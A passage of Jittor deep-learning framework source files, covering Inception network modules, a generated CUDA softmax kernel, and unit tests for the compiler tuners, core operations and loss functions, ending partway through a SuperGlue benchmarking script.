self.branch7x7dbl_4 = conv_block(c7, c7, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7dbl_5 = conv_block(c7, 192, kernel_size=(1, 7), padding=(0, 3))
self.branch_pool = conv_block(in_channels, 192, kernel_size=1)
def _forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = nn.pool(x, kernel_size=3, op="mean", stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch7x7, branch7x7dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionD(nn.Module):
def __init__(self, in_channels, conv_block=None):
super(InceptionD, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch3x3_1 = conv_block(in_channels, 192, kernel_size=1)
self.branch3x3_2 = conv_block(192, 320, kernel_size=3, stride=2)
self.branch7x7x3_1 = conv_block(in_channels, 192, kernel_size=1)
self.branch7x7x3_2 = conv_block(192, 192, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7x3_3 = conv_block(192, 192, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7x3_4 = conv_block(192, 192, kernel_size=3, stride=2)
def _forward(self, x):
branch3x3 = self.branch3x3_1(x)
branch3x3 = self.branch3x3_2(branch3x3)
branch7x7x3 = self.branch7x7x3_1(x)
branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
branch_pool = nn.pool(x, kernel_size=3, op="maximum", stride=2)
outputs = [branch3x3, branch7x7x3, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionE(nn.Module):
def __init__(self, in_channels, conv_block=None):
super(InceptionE, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch1x1 = conv_block(in_channels, 320, kernel_size=1)
self.branch3x3_1 = conv_block(in_channels, 384, kernel_size=1)
self.branch3x3_2a = conv_block(384, 384, kernel_size=(1, 3), padding=(0, 1))
self.branch3x3_2b = conv_block(384, 384, kernel_size=(3, 1), padding=(1, 0))
self.branch3x3dbl_1 = conv_block(in_channels, 448, kernel_size=1)
self.branch3x3dbl_2 = conv_block(448, 384, kernel_size=3, padding=1)
self.branch3x3dbl_3a = conv_block(384, 384, kernel_size=(1, 3), padding=(0, 1))
self.branch3x3dbl_3b = conv_block(384, 384, kernel_size=(3, 1), padding=(1, 0))
self.branch_pool = conv_block(in_channels, 192, kernel_size=1)
def _forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3 = self.branch3x3_1(x)
branch3x3 = [self.branch3x3_2a(branch3x3), self.branch3x3_2b(branch3x3)]
branch3x3 = jt.concat(branch3x3, dim=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = [self.branch3x3dbl_3a(branch3x3dbl), self.branch3x3dbl_3b(branch3x3dbl)]
branch3x3dbl = jt.concat(branch3x3dbl, dim=1)
branch_pool = nn.pool(x, kernel_size=3, op="mean", stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch3x3, branch3x3dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionAux(nn.Module):
def __init__(self, in_channels, num_classes, conv_block=None):
super(InceptionAux, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.conv0 = conv_block(in_channels, 128, kernel_size=1)
self.conv1 = conv_block(128, 768, kernel_size=5)
self.conv1.stddev = 0.01
self.fc = nn.Linear(768, num_classes)
self.fc.stddev = 0.001
def execute(self, x):
x = nn.pool(x, kernel_size=5, op="mean", stride=3)
x = self.conv0(x)
x = self.conv1(x)
x = nn.AdaptiveAvgPool2d(1)(x)
x = jt.reshape(x, (x.shape[0], (- 1)))
x = self.fc(x)
return x
class BasicConv2d(nn.Module):
def __init__(self, in_channels, out_channels, **kwargs):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv(in_channels, out_channels, bias=False, **kwargs)
self.bn = nn.BatchNorm(out_channels, eps=0.001)
def execute(self, x):
x = self.conv(x)
x = self.bn(x)
return nn.relu(x)
```
#### File: jittor/other/code_softmax.py
```python
import jittor as jt
from jittor import nn
def can_softmax_v1(a, dim):
if not jt.flags.use_cuda:
return False
if dim != -1 and dim != len(a.shape)-1:
return False
if a.shape[len(a.shape)-1] > 10000:
return False
return True
def softmax_v1(a, log=False):
assert can_softmax_v1(a, -1)
length = a.shape[-1]
# tnum = 1024
tnum = 500 if length % 500 == 0 else 512
tnum = 125 if length % 125 == 0 else 128
# tnum = 125
# tnum = 1000 if length % 1000 == 0 else 1024
# tnum = 250
per_thread = (length-1) // tnum + 1
ILP = 1
for ilp in [8,4,2]:
if length % tnum == 0 and per_thread % ilp == 0:
ILP = ilp
per_thread //= ILP
break
for_loop = f"""
#pragma unroll
for (int i=0; i<{per_thread}; i++)
"""
if length % tnum != 0:
for_loop += f"if ((i*{tnum}+threadIdx.x)*{ILP} < len)\n"
return jt.code(a.shape, a.dtype, [a], cuda_header=f'''
#include <{jt.compile_extern.cub_home}cub/cub.cuh>
#include <type/fp16_compute.h>
''', cuda_src=f'''
__global__ void kernel(in0_type* x, out0_type* y, int len) {{
typedef cub::BlockReduce<float, {tnum}> BlockReduce;
constexpr int need_log = {int(log)};
__shared__ typename BlockReduce::TempStorage temp_storage;
int id = blockIdx.x * len;
in0_type v[{per_thread}][{ILP}];
{for_loop}
vload<sizeof(in0_type)*{ILP}>(v[i], &x[id+(i*{tnum}+threadIdx.x)*{ILP}]);
// v[i] = x[id+i*{tnum}+threadIdx.x];
float v1 = -1e30;
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++) {{
v1 = max(v1, float(v[i][j]));
}}
__shared__ float vmax;
auto tmp = BlockReduce(temp_storage).Reduce(v1, cub::Max());
if (threadIdx.x == 0)
vmax = tmp;
__syncthreads();
v1 = 0;
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++) {{
if (need_log) {{
v[i][j] = float(v[i][j]) - vmax;
v1 += expf(float(v[i][j]));
}} else {{
v[i][j] = expf(float(v[i][j]) - vmax);
v1 += float(v[i][j]);
}}
}}
tmp = BlockReduce(temp_storage).Sum(v1);
__shared__ float vsum;
if (threadIdx.x == 0)
vsum = tmp;
__syncthreads();
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++) {{
if (need_log)
v[i][j] = v[i][j] - @expand_op(log,@in0_type,vsum);
else
v[i][j] = float(v[i][j])/vsum;
}}
{for_loop}
vload<sizeof(in0_type)*{ILP}>(&y[id+(i*{tnum}+threadIdx.x)*{ILP}], v[i]);
}}
int len = in0->shape[in0->shape.size()-1];
int bnum = in0->numel() / len;
cudaGetLastError();
kernel<<<bnum, {tnum}>>>(in0_p, out0_p, len);
CHECK(0 == cudaGetLastError());
''', cuda_grad_src=[f"""
__global__ void kernel(pout0_type* x, dout_type* y, out0_type* z, int len) {{
int id = blockIdx.x * len;
in0_type vx[{per_thread}][{ILP}];
in0_type vy[{per_thread}][{ILP}];
{for_loop} {{
vload<sizeof(in0_type)*{ILP}>(vx[i], &x[id+(i*{tnum}+threadIdx.x)*{ILP}]);
vload<sizeof(in0_type)*{ILP}>(vy[i], &y[id+(i*{tnum}+threadIdx.x)*{ILP}]);
}}
float v1 = 0;
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++)
v1 += {"float(vy[i][j]);" if log else "float(vx[i][j]*vy[i][j]);"}
typedef cub::BlockReduce<float, {tnum}> BlockReduce;
__shared__ typename BlockReduce::TempStorage temp_storage;
auto tmp = BlockReduce(temp_storage).Sum(v1);
__shared__ float reduce_var;
if (threadIdx.x == 0)
reduce_var = tmp;
__syncthreads();
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++)
vx[i][j] = {
"vy[i][j] - in0_type(expf(vx[i][j]) * reduce_var);" if log
else "vx[i][j] * (vy[i][j] - in0_type(reduce_var));"
}
{for_loop}
vload<sizeof(in0_type)*{ILP}>(&z[id+(i*{tnum}+threadIdx.x)*{ILP}],
vx[i]);
}}
int len = in0->shape[in0->shape.size()-1];
int bnum = in0->numel() / len;
cudaGetLastError();
kernel<<<bnum, {tnum}>>>(pout0_p, dout_p, out0_p, len);
CHECK(0 == cudaGetLastError());
"""])
```
#### File: jittor/test/test_asm_tuner.py
```python
import unittest
import jittor as jt
from jittor import LOG
import os
import re
import platform
class TestAsmTuner(unittest.TestCase):
@classmethod
def setUpClass(self):
inline = "inline"
if jt.flags.cc_type == "clang":
inline = "__attribute__((always_inline))"
self.cc_content='''
#include <cmath>
#include <algorithm>
#include "var.h"
#include "ops/broadcast_to_op.h"
#include "ops/binary_op.h"
#include "fused_op.h"
#define op0_Tx float32
#define op0_DIM 2
#define op0_BCAST 1
#define op0_index_t int32_t
#define op1_Tx float
#define op1_DIM 2
#define op1_BCAST 0
#define op1_index_t int32_t
#define op2_Tx float
#define op2_Ty float32
#define op2_Tz float32
#define op2_OP subtract
#define op2_index_t int32_t
using namespace jittor;
#define INLINE_FUNC '''+inline+''' void
INLINE_FUNC func0(op0_Tx* __restrict__ op0_xp, op1_Tx* __restrict__ op1_xp, op2_Tz* __restrict__ op2_zp) {
//@begin replace "vmova(.*,.*\(.*\))" "vmovnt\g<1>"
(void)(__builtin_assume_aligned(op0_xp, alignment));
(void)(__builtin_assume_aligned(op1_xp, alignment));
(void)(__builtin_assume_aligned(op2_zp, alignment));
op2_index_t range0 = 1048576;
op2_index_t range1 = 32;
op0_index_t op0_xstride1 = 1;
auto op0_xstride0 = op0_xstride1 * range1;
op1_index_t op1_xstride1 = 1;
auto op1_xstride0 = op1_xstride1 * range1;
op2_index_t op2_zstride1 = 1;
auto op2_zstride0 = op2_zstride1 * range1;
for (op2_index_t id0 = 0; id0<range0; id0++) {
for (op2_index_t id1 = 0; id1<range1; id1++) {
auto op0_xid = + 0 * op0_xstride0 + id1 * op0_xstride1;
auto op0_zd = op0_xp[op0_xid];
auto op1_xid = + id0 * op1_xstride0 + id1 * op1_xstride1;
auto op1_zd = op1_xp[op1_xid];
op2_index_t op2_i = + id0 * op2_zstride0 + id1 * op2_zstride1;
op2_zp[op2_i] = ((op1_zd )-(op0_zd ));
}
}
//@end
}
void jittor::FusedOp::jit_run() {
auto op0_x = ((BroadcastToOp*)(ops[0]))->x;
auto op1_x = ((BroadcastToOp*)(ops[1]))->x;
auto op2_z = ((BinaryOp*)(ops[2]))->z;
auto* __restrict__ op0_xp = op0_x->ptr<op0_Tx>();
auto* __restrict__ op1_xp = op1_x->ptr<op1_Tx>();
auto* __restrict__ op2_zp = op2_z->ptr<op2_Tz>();
func0(op0_xp,op1_xp,op2_zp);
}
'''
self.src_path=os.path.join(jt.flags.cache_path, 'jit', 'asm_test_op.cc')
self.asm_path = os.path.join(jt.flags.jittor_path, "utils/asm_tuner.py")
self.so_path=self.src_path.replace(".cc",".so")
def run_cmd(self, cmd):
return jt.compiler.run_cmd(cmd)
def check_cc(self, content, check_movnt):
LOG.vv("check_cc")
with open(self.src_path,"w") as f:
f.write(content)
cmd = jt.flags.python_path + " " + \
jt.flags.jittor_path+"/utils/asm_tuner.py --cc_path=" + jt.flags.cc_path + " '" + self.src_path + "'" + " -DJIT -DJIT_cpu " + jt.compiler.fix_cl_flags(jt.flags.cc_flags) + " -o '" + self.so_path + "'";
self.run_cmd(cmd)
s_path=self.so_path.replace(".so",".s")
bo=False
with open(s_path) as f:
for line in f:
if line.find("vmovnt")!=-1:
bo=True
break
if check_movnt and jt.flags.cc_type == "clang":
assert bo
@unittest.skipIf(platform.system() == 'Darwin', 'will crash on macOS')
def test_asm_tuner(self):
self.check_cc(self.cc_content,True)
self.check_cc(self.cc_content.replace("@begin","233").replace("@end","666"), False)
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/test/test_core.py
```python
import unittest
import jittor as jt
import numpy as np
import os
def expect_error(func):
try:
func()
except Exception as e:
return
raise Exception("Expect an error, but nothing catched.")
class TestCore(unittest.TestCase):
def test_number_of_hold_vars(self):
assert jt.random([1,2,3]).peek() == "float32[1,2,3,]"
assert jt.core.number_of_hold_vars() == 0
x = jt.random([1,2,3])
assert jt.core.number_of_hold_vars() == 1
del x
assert jt.core.number_of_hold_vars() == 0
def test_fetch_sync(self):
dtypes = ["float32", "float64"]
for dtype in dtypes:
x = jt.random([1,2,3], dtype)
res = x.data
assert res.dtype == dtype and res.shape == (1,2,3)
def test_set_seed(self):
a = jt.random([1,2,3]).data
b = jt.random([1,2,3]).data
assert str(a) != str(b)
jt.set_seed(1)
a = jt.random([1,2,3]).data
jt.set_seed(1)
b = jt.random([1,2,3]).data
assert str(a) == str(b)
def test_array_op(self):
data = [
np.array([1,2,3]),
np.int32([1,2,3]),
np.int64([1,2,3]),
np.float32([1,2,3]),
np.float64([1,2,3]),
]
for a in data:
assert sum(jt.array(a).data) == 6
assert np.all(jt.array(np.int32([1,2,3])[::-1]).data == [3,2,1])
assert jt.array(1).data.shape == (1,)
def test_matmul_op(self):
a = np.array([[1, 0], [0, 1]]).astype("float32")
b = np.array([[4, 1], [2, 2]]).astype("float32")
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.allclose(jtc, c)
a = np.random.random((128,3,10,20))
b = np.random.random((20,30))
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.allclose(jtc, c)
a = np.random.random((128,3,10,20))
b = np.random.random((128,3,20,30))
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.allclose(jtc, c), np.abs(jtc-c).max()
def test_var_holder(self):
jt.clean()
self.assertEqual(jt.number_of_lived_vars(), 0)
expect_error(lambda: jt.matmul(1,1))
expect_error(lambda: jt.matmul([1],[1]))
expect_error(lambda: jt.matmul([[1]],[1]))
self.assertEqual(jt.number_of_lived_vars(), 0)
a = jt.matmul(jt.float32([[3]]), jt.float32([[4]])).data
assert a.shape == (1,1) and a[0,0] == 12
a = np.array([[1, 0], [0, 1]]).astype("float32")
b = np.array([[4, 1], [2, 2]]).astype("float32")
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.all(jtc == c)
def test_save_load_sub_module(self):
class Net(jt.Module):
def __init__(self):
self.conv1 = jt.nn.Conv(3,3,3)
net = Net()
assert list(net.state_dict().keys()) == ['conv1.weight', 'conv1.bias']
assert list(net.conv1.state_dict().keys()) == ['weight', 'bias']
pkl_name = os.path.join(jt.flags.cache_path, "sub.pkl")
net.conv1.save(pkl_name)
net.conv1.load(pkl_name)
def test_module(self):
a = jt.Module()
a.__setattr__("x", 1)
assert a.__getattr__("x") == 1
a.y = 2
assert a.y == 2
def test_modules(self):
a = jt.Module()
a.x = jt.Module()
a.y = jt.Module()
a.a = jt.array([1,2,3])
a.b = jt.array([1,2,3])
assert list(a._modules.keys()) == ["x", "y"]
assert a._modules['x'] is a.x
assert a._modules['y'] is a.y
assert list(a._parameters.keys()) == ['a', 'b']
assert a._parameters['a'] is a.a
assert a._parameters['b'] is a.b
def test_copy_memopt(self):
# exe: post run
# remove pending done
# add hold pending done
# pending release mem done
a = jt.rand(10)
b = a.copy().copy().copy()
a.name("aa")
b.name("bb")
cnt = 0
graphs = jt.dump_all_graphs()
for x in graphs.nodes_info:
if "Var" not in x: continue
print(x)
if ",aa," in x:
assert ":2:i" in x, x
elif ",bb," in x:
assert ":1:i" in x
else:
assert ":1:i" in x
b.sync()
cnt = 0
graphs = jt.dump_all_graphs()
for x in graphs.nodes_info:
# print(x)
if "Var" in x and ",0)" in x:
cnt += 1
assert cnt == 2
def test_fuse_memopt(self):
def check():
a = jt.rand(10)
b = (a.copy().name("copy_out1") + 1).sqr() + a.copy().name("copy_out2")
b.sync()
for n in jt.dump_all_graphs().nodes_info:
if "Var" not in n: continue
# print(n)
if "copy_out1" in n:
# copy out1 is not free
assert ",0)" not in n
if "copy_out2" in n:
# copy out2 is freeed
assert ",0)" in n
da = jt.grad(b, a)
da.sync()
check()
jt.gc()
assert jt.liveness_info()['lived_vars'] == 0
def test_out_hint1(self):
a = jt.rand(10)
b = jt.rand(10)
c = jt.ternary_out_hint((a<b).out_hint(), a, b).clone()
c.sync()
da, db = jt.grad(c, [a, b])
jt.sync_all()
for n in jt.dump_all_graphs().nodes_info:
if "Var" in n and "bool" in n:
print(n)
assert ",0)" not in n
jt.ternary_out_hint((a<b).out_hint(), a, 0).sync()
def test_out_hint2(self):
a = jt.rand(10)
b = jt.rand(10)
c = jt.ternary(a<b, a, b).clone()
# c.sync()
da, db = jt.grad(c, [a, b])
jt.sync_all()
for n in jt.dump_all_graphs().nodes_info:
if "Var" in n and "bool" in n:
print(n)
assert ",0)" not in n
def test_relu_memopt(self):
x = a = jt.rand(10,10)
for i in range(10):
# a = jt.nn.relu(a)
a = jt.ternary_out_hint((a>0.0).name("b"+str(i)), a, 0.0)
a = jt.matmul(a.name("m1"),jt.rand(10,10).name("m2")).name("m3-"+str(i))
da = jt.grad(a, x, True)
# jt.clean_graph()
da.sync()
cnt1 = 0
cnt2 = 0
for n in jt.dump_all_graphs().nodes_info:
if "Var" in n and ",0)" not in n:
cnt1 +=1
if "bool" in n:
cnt2 += 1
print(cnt1, cnt2)
assert cnt2 == 10
assert cnt1 <= 33, cnt1
def test_node_order(self):
a = jt.nn.Sequential()
for i in range(10):
a.append(jt.nn.Linear(10,10, bias=False))
sgd = jt.optim.SGD(a.parameters(), 0.1)
jt.sync_all()
with jt.log_capture_scope(log_silent=1,
log_vprefix="exe=100") as logs:
x = jt.rand(3,10)
y = a(x)
sgd.step(y*y)
jt.sync_all()
orders = []
for l in logs:
msg = l["msg"]
if "Finished" in msg:
# print(msg)
if "weight" in msg:
assert msg.count("Var") >= 2
order = int(msg.split('fused ')[1].split("/")[0])
# print(order)
orders.append(order)
assert len(orders) == 10, orders
for i in range(10):
assert orders[i] <= 14+i*3
def test_bc_bug(self):
a = jt.zeros((1,1))
b = a * 0.5
b.sync()
da = jt.grad(b, a)
da.sync()
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/test/test_loss.py
```python
import unittest
import jittor as jt
import os
import numpy as np
import jittor.nn as jnn
skip_this_test = False
try:
jt.dirty_fix_pytorch_runtime_error()
import torch
import torch.nn as tnn
except:
skip_this_test = True
@unittest.skipIf(skip_this_test, "No Torch found")
class TestLoss(unittest.TestCase):
def test_l1_loss(self):
jt_loss=jnn.L1Loss()
tc_loss=tnn.L1Loss()
output=np.random.randn(10,100).astype(np.float32)
target=np.random.randn(10,100).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_mse_loss(self):
jt_loss=jnn.MSELoss()
tc_loss=tnn.MSELoss()
output=np.random.randn(10,100).astype(np.float32)
target=np.random.randn(10,100).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_nll_loss(self):
tc_loss = tnn.functional.nll_loss
jt_loss = jnn.nll_loss
output=np.random.randn(10,10).astype(np.float32)
target=np.random.randint(10, size=(10))
jt_y=jt_loss(jt.array(output), jt.array(target),reduction='mean')
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target),reduction='mean')
assert np.allclose(jt_y.numpy(), tc_y.numpy())
output=np.random.randn(10,10).astype(np.float32)
target=np.random.randint(10, size=(10))
weight=np.random.randn(10,).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target),jt.array(weight),reduction='mean')
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target),torch.from_numpy(weight),reduction='mean')
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_loss(self):
jt_loss=jnn.CrossEntropyLoss()
tc_loss=tnn.CrossEntropyLoss()
output=np.random.randn(10,10).astype(np.float32)
target=np.random.randint(10, size=(10))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_loss_v2(self):
B = 100
C = 5
for shape in [[100,1],[],[100,20]]:
s1 = [B,C]+shape
s2 = [B]+shape
a = np.random.randn(*s1).astype(np.float32)
b = np.random.randint(0,C,size=s2).astype(np.int32)
weight = np.random.randn(C).astype(np.float32)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight),reduction=r)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight),reduction=r)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),reduction=r)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),reduction=r)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)))
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b))
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight))
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight))
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight),reduction=r,ignore_index=C//2)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight),reduction=r,ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),reduction=r,ignore_index=C//2)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),reduction=r,ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),ignore_index=C//2)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight),ignore_index=C//2)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight),ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
def test_cross_entropy_ignore_index(self):
ignore_index = np.random.randint(0, 10)
jt_loss = jnn.CrossEntropyLoss(ignore_index=ignore_index)
tc_loss = tnn.CrossEntropyLoss(ignore_index=ignore_index)
output = np.random.rand(100, 10).astype(np.float32)
target = np.random.randint(10, size=(100))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_weight(self):
weight = np.random.rand(10).astype('float32')
jt_loss = jnn.CrossEntropyLoss(weight=jt.array(weight))
tc_loss = tnn.CrossEntropyLoss(weight=torch.from_numpy(weight))
output = np.random.rand(100, 10).astype(np.float32)
target = np.random.randint(10, size=(100))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_weight_ignore(self):
weight = np.random.rand(4).astype('float32')
jt_loss = jnn.CrossEntropyLoss(weight=jt.array(weight), ignore_index=1)
tc_loss = tnn.CrossEntropyLoss(weight=torch.from_numpy(weight), ignore_index=1)
output = np.random.rand(3, 4, 2,2).astype(np.float32)
target = np.random.randint(4, size=(3, 2,2))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
np.testing.assert_allclose(jt_y.numpy(), tc_y.numpy())
def test_bce_loss(self):
jt_loss=jnn.BCELoss()
tc_loss=tnn.BCELoss()
jt_sig = jnn.Sigmoid()
tc_sig = tnn.Sigmoid()
output=np.random.randn(100).astype(np.float32)
target=np.random.randint(2, size=(100)).astype(np.float32)
jt_y=jt_loss(jt_sig(jt.array(output)), jt.array(target))
tc_y=tc_loss(tc_sig(torch.from_numpy(output)), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
weight=np.random.randn(100).astype(np.float32)
jt_loss=jnn.BCELoss(weight=jt.array(weight), size_average=False)
tc_loss=tnn.BCELoss(weight=torch.Tensor(weight), size_average=False)
jt_y=jt_loss(jt_sig(jt.array(output)), jt.array(target))
tc_y=tc_loss(tc_sig(torch.from_numpy(output)), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_bce_with_logits_loss(self):
jt_loss=jnn.BCEWithLogitsLoss()
tc_loss=tnn.BCEWithLogitsLoss()
output=np.random.randn(100).astype(np.float32)
target=np.random.randint(2, size=(100)).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/test/test_matmul_tuner.py
```python
import sys
import os
import jittor as jt
import unittest
import time
import numpy as np
from .test_reorder_tuner import simple_parser
from .test_log import find_log_with_re
class TestMatmulTuner(unittest.TestCase):
def test_matmul_tuner(self):
n,m,k = 10,10,10
a = jt.random([n,m])
b = jt.random([m,k])
with jt.log_capture_scope(
log_v=0, log_vprefix="tuner_manager=100,var_relay=100",
compile_options={"test_matmul_tuner":1}
) as rawlogs:
c = a.broadcast([n,m,k], [2]) * b.broadcast([n,m,k], [0])
c = c.sum(1)
jc = c.numpy()
nc = np.matmul(a.numpy(), b.numpy())
assert (np.abs(jc-nc)<1e-3).all()
logs = find_log_with_re(rawlogs,
"Run tuner matmul: confidence\\((.*)\\) candidates\\((.*)\\)$")
assert len(logs) == 1
assert logs[0][0] == "20", "confidence of reorder should be 20"
candidates = simple_parser(logs[0][1])
assert candidates == {"relay0":[1,0]}, candidates
logs = find_log_with_re(rawlogs, r"get_relay_src([\s\S]*)")
assert len(logs)==1
assert "@relay_op" in logs[0]
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/test/test_superglue.py
```python
import unittest
import jittor as jt
import numpy as np
import os
from jittor.test.misc import superglue
from jittor.test.misc.superglue import SuperGlue
import time
@jt.flag_scope(use_cuda=1)
def main():
global superglue
superglue.split_size = int(os.environ.get("split_size", "12"))
# superglue.split_size = 1000000
batch = 30
num = 2000
dim = 128
# jt.display_memory_info()
# os.system("nvidia-smi")
# breakpoint()
with jt.no_grad():
config = {
'superglue': {
'sinkhorn_iterations': 25,
'match_threshold': 0.01,
'keypoint_position_dim': 2,
'descriptor_dim': dim,
'use_dual_softmax': True,
'GNN_layers': ['self', 'cross'] * 9,
}
}
superglue = SuperGlue(config.get('superglue', {}))
superglue.eval()
data = {
'keypoints0': jt.rand((batch, num, 2), dtype=jt.float),
'keypoints1': jt.rand((batch, num, 2), dtype=jt.float),
'shape0': jt.rand((batch, 2), dtype=jt.float),
'shape1': jt.rand((batch, 2), dtype=jt.float),
'descriptors0': jt.rand((batch, dim, num), dtype=jt.float),
'descriptors1': jt.rand((batch, dim, num), dtype=jt.float),
'scores0': jt.rand((batch, num), dtype=jt.float),
'scores1': jt.rand((batch, num), dtype=jt.float),
'all_matches': jt.randint(0, num, (batch, num, 2), dtype=jt.int),
'return_match': False,
# 'match_num': match_num
}
use_fp16 = int(os.environ.get("use_fp16", "0"))
if use_fp16:
jt.flags.amp_reg = 2
for k,v in data.items():
if isinstance(v, jt.Var) and v.dtype == "float32":
v.assign(v.float16())
for v in superglue.parameters():
if v.dtype == "float32":
v.assign(v.float16())
jt.sync_all(True)
import pickle
jt.sync_all(True)
for x in range(5):
print(x)
jt.gc()
x = superglue(data)['loss']
x.sync()
jt.display_memory_info()
# os.system("nvidia-smi")
# breakpoint()
# print(data)
# print(x)
# with open("/tmp/record.pkl", "wb") as f:
# pickle.dump([data, x], f, pickle.HIGHEST_PROTOCOL)
# with jt.flag_scope(trace_py_var=3, profile_memory_enable=1):
# x = superglue(data)['loss']
# x.sync()
# jt.get_max_memory_treemap()
# exit(0)
jt.sync_all(True)
time0 = time.time()
jt.flags.profiler_enable = int(os.environ.get("profiler", "0"))
for x in range(20):
print(x)
# jt.display_memory_info()
x = superglue(data)['loss']
x.sync()
# print(x)
jt.sync_all(True)
time1 = time.time()
